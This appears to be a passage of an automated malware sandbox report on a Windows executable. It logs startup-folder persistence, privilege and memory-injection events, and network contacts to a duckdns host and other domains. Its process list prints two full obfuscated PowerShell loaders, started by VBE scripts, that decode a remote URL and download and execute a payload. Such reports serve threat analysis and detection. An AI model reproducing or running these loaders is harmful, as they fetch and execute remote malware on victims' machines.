Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A

Drops startup file

Description	Indicator	Process	Target
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.lnk	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.lnk	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeDebugPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A

Suspicious use of SetWindowsHookEx

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 2032 wrote to memory of 1308	N/A	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	C:\Windows\System32\WScript.exe
PID 2032 wrote to memory of 1308	N/A	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	C:\Windows\System32\WScript.exe
PID 2032 wrote to memory of 1308	N/A	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	C:\Windows\System32\WScript.exe
PID 2032 wrote to memory of 2868	N/A	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	C:\Windows\System32\WScript.exe
PID 2032 wrote to memory of 2868	N/A	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	C:\Windows\System32\WScript.exe
PID 2032 wrote to memory of 2868	N/A	C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe	C:\Windows\System32\WScript.exe
PID 1308 wrote to memory of 2068	N/A	C:\Windows\System32\WScript.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1308 wrote to memory of 2068	N/A	C:\Windows\System32\WScript.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1308 wrote to memory of 2068	N/A	C:\Windows\System32\WScript.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 824	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\system32\cmd.exe
PID 2068 wrote to memory of 824	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\system32\cmd.exe
PID 2068 wrote to memory of 824	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\system32\cmd.exe
PID 2868 wrote to memory of 1704	N/A	C:\Windows\System32\WScript.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2868 wrote to memory of 1704	N/A	C:\Windows\System32\WScript.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2868 wrote to memory of 1704	N/A	C:\Windows\System32\WScript.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1704 wrote to memory of 1832	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\system32\cmd.exe
PID 1704 wrote to memory of 1832	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\system32\cmd.exe
PID 1704 wrote to memory of 1832	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe

"C:\Users\Admin\AppData\Local\Temp\a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dwhdnu.vbe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\exwlrs.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firhjulede47='Sub';$Firhjulede47+='strin';$Lnarbejderne = 1;$Firhjulede47+='g';Function Cremerne($Barnefaderens){$Regretfully177=$Barnefaderens.Length-$Lnarbejderne;For($Oreodontine=5;$Oreodontine -lt $Regretfully177;$Oreodontine+=6){$Nazeranna+=$Barnefaderens.$Firhjulede47.Invoke( $Oreodontine, $Lnarbejderne);}$Nazeranna;}function belejlige($Foreleg){. ($omdiskuteret) ($Foreleg);}$Krmmerhuse=Cremerne ' MiniMAgoraoTuri zPressiFore lSerinlbino.ae ang/Macro5Worde.Mulig0Decri Nynaz(GuttuWSamlei S.iknpse dd Li,eoSubjewHrerssSente Str.NSalgsTAd.pr M,ni1Subfi0 Bibe.Bourr0Mo,ig;Lderb .redeW PostiAarrinKaram6multi4 hand; At,a draxsving6 S,il4Shahp;Duppe LazarrShellvS leh:Blesa1Friha2Co,nb1Socia.Syste0Risen)Tearj EntopGGlas.eHo decReex.k CalaoHelta/Tille2Sl un0Emehv1I ddr0Unwin0Menom1Illim0 Anti1Desub FormaFAnhydiEks rrSk,ideRv.skfAppreoUdpinx.eter/flids1Tandb2Lejer1Slave.Blama0Cykli ';$Insectival=Cremerne ' BeatU DennsN tideTeksbrmicro- etlaAWhinig b.gneGrinenBibelt Gast ';$fairylike=Cremerne 'BrusehOn netScur,tGan ep Amats Leth:Ortyg/ Lo a/SuperjUnmanoInfikcRensecF,ertuHex npVirknaMatert,ycamiForhaoDahoonTankeaOpkallo.tvis eronc erfoiBeckseilen,n YnglcInrigePreli.Svineotho wrKontogPassa/ iolezPaddlaFinanrH.lpeaEmbai/PragtGFarvelPunchoTilremFordmeBoligr overuPatril Stomi.ortatprideiStrygsChymi.HemmedKra leMinimpTur,ylIslamoArchayDicki ';$Thage=Cremerne 'Unfri>.liss ';$omdiskuteret=Cremerne ' dpegi CutaeBetj,x ddit ';$Tattie='Udbredelsesomraader';$Flovserne = Cremerne 'UnmeleCompacDitikhUds.roGenin Toeli%DunhiaConcepTillipchalcdFoderabil.etUranoaBrand%Invo,\Rhi oSUmulioFolkerOversbSkdese Men.tBabel.D.limUBlocknParadbBruge Half&Pingu&Uindb .hirteCon icFednihGandeoCant OghatOprin ';belejlige (Cremerne ' Krav$ Hopeg akalIncl.opes,ibKlkniaNonsilSiren:DrakbpUsikkrHyperoToelivDmoneoS,rukkGamina HypetSt derSha e=Areng(sherecRiotem BelvdPr va Disk/StenfcKo,ge ,ocki$ElektFChr,mlNsehooDebowvFaradsAssi,eC orerSka,tnI,ddreOvers) Prof ');belejlige (Cremerne ' Ste,$Slv,ng .epalKl edoArranbImagoaRefutlEpigr:Ska lS Ch,rttmm.racyanoi .fferHematcaubepaSqua sBaskeeUdsyrsgu.ra=Produ$DibblfBesn.aReil.iNoninrPauliyB,somlBrig i.uropkTappee,enzi. tags Ta.rp,nhaulSwathiVernot orig(Cruel$ SpalTTabelhSipsba.vedjgKniveeRitua)Missi ');$fairylike=$Staircases[0];$bestyrelsesreferaterne= (Cremerne 'Dekl,$hjlp.gUnpeclUdkmpoDe erb uperaFo.vilSyn.s:Fa.ceUTopfonFlan c,tartuCava r .olibMe.th=CyrilNFlj,reOospowJirin-DisanOMitogbU.derjGtraneKilotcdam.rtDi.ta ResiS S.ovyPostisUnsugtPreabeFjerdm.karl. orbeN In lePr.rotBorgm.Cod,rW ImpeeH llibSelskCUn.erlI,variKrakeeBlindnA erat');$bestyrelsesreferaterne+=$provokatr[1];belejlige ($bestyrelsesreferaterne);belejlige (Cremerne 'resun$preamUElectn ParecScrapuTillgr evisbPerso..nderHSammee Hud,a No.cd .ilje TiccrBl,nisMorsi[afspn$NonfuIbaladnExtrasImpoveTranscEftert.largiRecanvUndera BrullWri.t]styrt=Bagst$De.isKOparerSpiramGolasmAllokeHektorPrebih VoicuAnnu.sUdrugePers ');$Nykkes=Cremerne 'Sandg$KbtesUPreponJaloucBew au BogbrRecitbpharm.Loai DNdl.noMediawBekennSem el.ngoroMolybaBrigadUd,ryF.luigi NarklAmpaneOverf( unmi$R klafHelioaRein,iFosforFarray seholm.spui T.lsk,oursexerog,L,opo$ krifgHauntl parao embebSubdoaProsplO lysiVampesUds.raEpilat FootiDatoloParaln Emp,sEkvip) Sla, ';$globalisations=$provokatr[0];belejlige (Cremerne '.aris$Sceneg S btlLrerkoF.yvebNormaaMo,gelBind,:GravsbPensieNorm,lGibboiChlorz Retoe SorgrUdhvne ldri=Varme(AlurrTIndfaeGallis CoactBl as-Su,alPHamesaUndert AffrhFe,lb Tidsg$ MosagRevinlIntraoEfterbIoni.aCallelForbriM rtgsS.abha Derit aabsiCon ioFaithnJadeisGaffe)S.rot ');while (!$belizere) {belejlige (Cremerne ' .and$TubipgMeaselPopulo Sy,tbAto,laDig,al Va.n: biscCG leroC anhnLang fEdgebi Kj sdErythe BhunrBrn k=Frbid$Coupat Chror Re,ouNivaleHet,r ') ;belejlige $Nykkes;belejlige (Cremerne 'InterSHomontplaceaVi.rarGara,t ,ett-AandeS TyktlSkaereF.rileDefinpRaffi H,gbu4Shall ');belejlige (Cremerne ',irak$RecabgPreeplB,ainoEmig b.nteraDre,alUnscu:Inds,bWareseR ceplAlb,niBlattzAlumieSc,olr gen.eBucol= St,r(K,loaTFljteeB,yggsAvoditPillo-MultiPFrydea AmagtCyanshbruge Torta$NondegTa ajlSt.neoUns,sbBr,ncamangal dleji Pa esShaf,aAletatTvegei Ad ioHer.tn TilmsRes,s)Kaste ') ;belejlige (Cremerne 'Toyli$ TwadgUngo.lbeg eoPhlo,b DiffaSik elEne.g:Race oAgterpterris ForslFolkeaLocutaTime =Pala.$FotoggAnanalkedeloScenebMoab aArvellInver:P.ecoJMeno uSin,sbbl.tti Protlmis,auPurlimM ljtsGurramBl,dtiMogv,dDrumbdTyndeas,enegReligeRegrenDrepasUopmr+Butik+Ackno% kern$Mch,gSChryst,idegaEmanuiMankirBerascopstrask.drs UdtreGavnls Syst.Nicolc.armkoKura,uAl trnrekurt Suff ') ;$fairylike=$Staircases[$opslaa];}$skriftsnit=294679;$Pomeransskal=27677;belejlige (Cremerne 'Rinki$Funktg BuntlHoldioPudibbNum,ea Di plLevem:SilicVAppanaArbe,g Partt arsm hirdeStaklsSkomatUnadje sller Atri ema=Overg eimbGudtyderichmt harr-BromoC Ka aoImprinWandltU.ganeLuf knVi totTidsp For.n$Unde.g Bed,lConfioRe,edbSubliaTagenlMa keiRgte ssel.maOphictPreceiInigooH.lshnEnkels Tres ');belejlige (Cremerne 'Uigen$UlkengSt erlE.hveoVeks.bNemala Supel tolt: MennRT iche C.unfDiagoe Spart Astre orr Aechm=Flags Megap[Kupo.S arjoyMondes PristTermieDeplam .lad.WiltoCKultuoReb unImprev.ykkeeTfteerDysfutCoshe]Comps:Sansc:unbu FTimefrMundioI framDomi BUngyra Indfs Fluoe Dism6Peach4umrkeSLikv tLandgrLo,taiorgannFlad gTamme(.arad$RundkVEneinaW,orrg TotatBlaasm oykoeSwazis,hrontRegraege dir kste)Anal. ');belejlige (Cremerne 'Lnest$TrumpgCaraml.roncoPervebDagg,aOrdkllAfrej:BrnefUPesosnEr kkeGrovexhypobpSupereIngegd Fli,iBeaujeTovrenTimort ArkflValgpyHofde3produ Chole= Pla, .inis[ReestSMona,yOverss ioskt SysseSkjtemUland.GoliaTGritteLept.xPap,rtTe,tl. TilbEConvenBatinccalopoPygmydWart,i RestnCrategVampe]Vagst: Epis:TyranAUrethSTotalC BrobI iogrI Nonp. TegnGUd,tae dekatAdenaS UnbutSigjnrHypofiSubsenPraksgGrusg(Fo.ko$lingbRBimeteHyperf FrndeAkadetSkamseErkla)Malis ');belejlige (Cremerne ' Moto$ShawlgCon alP ndioOpiumbKorthaPy.nilSitti:Mome UGdninntriakc,nnemeFlovmrSrilatT,gheiTudehfKandiiL mpwaalkydbStandlLotuseHulkolBlselyUndew=In us$ungagUSpinknThaiseCineaxhyre.pUdpoleO.ervdinteli Arrhe Dek.nLatentD.apelAstroy Ran 3stuep.SymptsPiezouFeateb TangsMickyt Satar LongiEnf.en D.neginvol(Phila$StedssDelmnkDeli,r ClamiAc nefbundstKultusFormun LazaiTes.etPensi,Bling$slgtsP FingoBrudemskelseFr.garPr,poaComp,nK leys StersPicomkL assa OptalVi.ef)Micro ');belejlige $Uncertifiablely;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sorbet.Unb && echo t"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sawneb='Sub';$Sawneb+='strin';$Delfinarium97 = 1;$Sawneb+='g';Function nosologies($Presignify){$Elvrksarbejdere=$Presignify.Length-$Delfinarium97;For($Ludbehandlendes=5;$Ludbehandlendes -lt $Elvrksarbejdere;$Ludbehandlendes+=6){$Kombifilter+=$Presignify.$Sawneb.Invoke( $Ludbehandlendes, $Delfinarium97);}$Kombifilter;}function Lrerkollegierne($Pingvinernes){. ($Nabosprog) ($Pingvinernes);}$Autotelic105=nosologies ' PseuMPalomostvnizJehjdiDysphl TofalRegneaDisp,/Perip5Lysso.Ran.a0Subu. Drill(UdlejWNajeriFrokonPrkend Phleo ommuwStyllsParkg gn toNL.ditT Lava Casa1forfr0 Urre.Unlac0glend;Gloss EpsilWpig.biFormknApiol6Sakka4,ntro;Adorn UstabxEstim6Antir4S.orh; Gums GenbrrTransv Net.:Twop 1 Psa,2Lands1Virks.Beb.e0Nonex) Adol AcquiGDepope ou.pcReorik UvejoTjrin/Moral2Blast0Overf1Bogen0ha,mo0.rsal1,teuc0Skraa1Subci skravFNidiniCar.arNdrineEnamsfMelanoNordexSe ti/Zygad1Hydro2 B un1 Bej,.B.der0 Apht ';$uninoculable=nosologies 'JoyceU Sk fsWas,ieSkindrWodge-AntheApostpgEle teQuavinSejt,tPer,t ';$kammermusikken=nosologies ' SpechSammetLivestMaarep CarisFjerk: Acar/Aer,g/unifot KoncaskabetTrontspaafueNorthl Ta.feEntrec ncurt.anutrTransorin,onInstai InkocOu,susBaade. ncoucKongeoUnbur.ContizO,tflwTabul/Br,basStavndRegel/Un,erTVelr r Speco SerpmSpeaklUnreteAnginrMilhaeAandlv ImmeoSdc.llSubprvCoxaleSocierNondeeH,lmlsViole.HundrctelessBa.ebvManu ';$Roomette=nosologies 'U der>Sakk. ';$Nabosprog=nosologies 'In,ohi PorpePleurx Cess ';$Fldebollernes='osteomatoid';$Forborne = nosologies 'PerosePlanlcNoctih .namotorn, M.us%MilieaFortrp ourbpArmozdSammea VagttBor.tama,eg%Tilpl\FondsIHovednSucc,dununit MoneaEastes.useutApiosnPrferiAekvinFarc,gsvinge VivirGe.tunWateres ripsHersk.a tioV De.aoDivisiS.xmi Retra& Tave& wolf Landse Disccrungeh k rmo,enop SarditNoedv ';Lrerkollegierne (nosologies 'Overh$SoldagSt,ealNiggloAc.rebSits aVesi.lmonot:PygalCArealiCorrit,okolrCel.doErstan B rtmTilpleImmanlFondeiAnmrksAdiposChakoe F llnCongr=Koers(.lkalcMyttemOpfredTre t Teleg/ UngkcN nas Pr.re$UnderFE.plioAkt orTyrosb .isuoPlanlrHete.nUdueleA.oli)Sters ');Lrerkollegierne (nosologies 'galge$H lhegTriadlKee,aoS.bmab Su eaJenlgl Pure:Stvs,F DolkiSn,reg Pe,pu Antir litulTrofuiIn stgSpro,tFulds=Kaffe$UnthrkVversaM.kromMuddemSi,kee RumfrOpbevmBevbnuSameksFdep.i.erkokCymrik KataeTransnm,tal.,edgisPhotopForkylPhariibrynjtIndse(ammon$ InddRBou,co Overo Sp,lm E.ineU.iastAlt,rtPhonoe hund)Proce ');$kammermusikken=$Figurligt[0];$Billedhugger= (nosologies 'Espen$Troubg rtygl fvejoEff cb CabuaTrofflLacte:IndvaB OutsaSnvler PreaiPr.colD ivalOve.paBrndp=BretwN omlseBenedw.arak- .tarOBra.nb tancjHoodle Boatc Un etStuds rupSTaaley Eks s TonattowereSprinm D ff.M.nelN Tinge S.iltTilsp. GesaWUdlaaeMa hibB.rupCLejlillageriLeveleMinernAss rt');$Billedhugger+=$Citronmelissen[1];Lrerkollegierne ($Billedhugger);Lrerkollegierne (nosologies 'Skr,t$CuriuB FlipaPanderBubaliCavialKo belBlussa,itho.StrneHP,ecueStu,eathorod.verpeFe.ltr.aleosblens[Inter$Cyke,uKnibtnStdtviGn,tonMaralo.accac GriluHenr.l Lo.aa xsebs vbol bsceeChan,]K.nfe=Serra$Bo,siARe,rguOverstPsychoBagflt HampeAdminlbudgeiI,ealcGate,1Cup.e0Havar5 Enta ');$Gentlemanliness=nosologies ' Spor$AuricBSold,a G,ckrS oroiLachrlCitatlInteraFrem,. ErhvDModeroSkaktwS.lfonDouchlLol hoKelpsaEpiled n,nlF popkiMarmolUnmumeAntim(Disin$Tipsfk ,neqaWavenmUbeskmDyreheSv,gerTroldmBetalu ukas b,roi DrookA komk,ordoeErstan,onre,Grund$Myr hRSku de ,staeShabbcGuarnhImporoTro s)Dolkt ';$Reecho=$Citronmelissen[0];Lrerkollegierne (nosologies ' Uden$G,stugFodrilStadsoForsybAfst,aDrosllCapuc:UnsubNTurnoycensubPrecorImmatu Redod KarldVoldeeOcclunSysteeDeuto1L,ach3 Morp2Pheny= D kk( FaasTHoroseCaceisMiasmt ppro- eellPFanmaaCionitStillhAmano uram $FikssRArthreBybuselysvacHete,hEuro,o.efra) Ende ');while (!$Nybruddene132) {Lrerkollegierne (nosologies 'Nvenp$Miilig,ostslRu.eio Uns bIndmaa P.ptlPr.ve:OutbrWhydr,e SerisBrutts Tur eImparlAnden=Nonse$Aftegt FluerGn llu biaueS,rve ') ;Lrerkollegierne $Gentlemanliness;Lrerkollegierne (nosologies 'SkovbSSemimtForpaaPosserAp,mitTuber-DemagSStegolOveroeHetereMelonpNrved mai.f4Notat ');Lrerkollegierne (nosologies 'Misba$Emb lg nlilVelf oTr.vrbKonfeaAyahalWorsh:NonsuNMaskiyTarifbtrapprS nituEpicodHukkedBarnae LandnChroneMo.or1 P nk3 pock2 Lata=genn ( trilTFlosneSekr sFremvtAte o-SlrinPDossyaA.teetRegiohGa.eo A tio$ Sa,iRLach,eS ileeMisapcGomuthSociooEst,b)Bo,tl ') ;Lrerkollegierne (nosologies 'Depor$D mingBa dul PereoEksp,bTeknoa Menol Ekse:divinAK.ndikFolket SkuliRenseeBrn,taMangfvo,tthaRe,ivnOblonc QuineSniver UnadnTapeteUngli=Absol$ eazgSoloslForsvoVis.abMikkiaPredolElmie:AphesI rdgrnMikelv,ssoci BlactBroddeLaina+Febru+ ,erl% Opla$OrdreFtilbyiM.ltigHandeuPrecorversalB.arbiSp,ydgBaventHe.al. Skruc.manuoCoosiuRefu nEtiketC mot ') ;$kammermusikken=$Figurligt[$Aktieavancerne];}$unembowered=292446;$Nonprosperously=29824;Lrerkollegierne (nosologies ' ,ilj$Antiig N nmlSpanco urtib.rvyeaIndtelFrute: ToxiDZerotiHy.rof T.aitBenmeoRifisnUnt egFortheLitzir K ureOrdre ,kuau=Dry,t conciG Unsue osehtEn.ou-CatecCKalveoiso onAnsart StaveaxtrenFlumatbimas ribo$VrktjRRealkeUnf.meFlidec EksthAmlonoSpi.e ');Lrerkollegierne (nosologies ' Ste.$Ly,regAdmitl Chaso WaulbMyeloa.eroslSjals:C,rcuB,rdeieS aresDrfyliLoesngSprydtHenaaiWelshgPaadmePanthlSyntosLirate Nrahn Bhag Trekv=Klode Skues[ CoccSCarpoyS,onss crimtAmalgeFreebmCurso.PhotoCPrio oFrisrnVandkvStrane K itr UnwrtEldor]S ile: O.ci:SuperFstykerLydbgoSmalnmRe.raBNachgaTynd s,uleeeKa.ed6lus e4SemidSPe get anc,r TheriNewfonFilifgRaadh(Pa an$RecarDMicroiAf,oefSystetAfsteoDiplon ForbgMinareI.perrBeatgeVelve)Asbes ');Lrerkollegierne (nosologies 'Snigm$AfvangLute.lCrayoo .verb MuleaG amolBar.e:Lyse.CSco,ehVipsteBroenmDusiniRapa lTraceurappem SalgiBrevsnNonaueFry.ssForurc EngreD quen heetUnwar Reseq=Lapp Incit[ StedSBlodpyPrimesPle,etSyllaeRamarmAutom.cor eTMoraleAc.uaxNo cotA.jud.PurliECel,in tabec .ormo tru.ddeteriHindrn velsgUnton]Velig:Zelin:Rast,AExpatS BetoCDacr ITackiIBrnek. RecoG F lseAlloct asteS PlagtMilitrMerkaiJernanWeedlg Ove.( Eval$EnlayBLandoeParafs Volci HjemgWit.ot SteliS.inggrenteeUhenslStudisF,mbreNoternBesyn)Vascu ');Lrerkollegierne (nosologies 'arrak$ YellgStonelBrainovr,epb DanmaSto el Klip: K.ltSCalcatUige.aW oretVinkooJensps tr,cpThorno BromrTon.ae .vad=Waste$,iannCSkrmth,onsueryghvmIndskiThalalbryggu ompumThuriiTrietn LongeIndflsprestc,lmaheHermenMusdot Bahr.frugtsHypoauDeflab ChapsInfortApicir Hus,idispinOrddegParab(Efte.$ SpiruUnbefnDiscre HypemConsib.andloNonpawDampnef,rmar,ithyeKommedUford, siem$piperNForm oAfp,vnBuc,fpThonfr WintogrievsPopulp ElfleUndusrForldo CanouPsykos sen lInddayUdskr)Regas ');Lrerkollegierne $Statospore;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indtastningernes.Voi && echo t"

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	mayxw9402.duckdns.org	udp
US	12.221.146.138:9402	mayxw9402.duckdns.org	tcp
US	8.8.8.8:53	joccupationalscience.org	udp
AU	185.184.154.17:443	joccupationalscience.org	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	8.8.8.8:53	tatselectronics.co.zw	udp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
US	207.244.125.218:443	tatselectronics.co.zw	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
AU	185.184.154.17:443	joccupationalscience.org	tcp
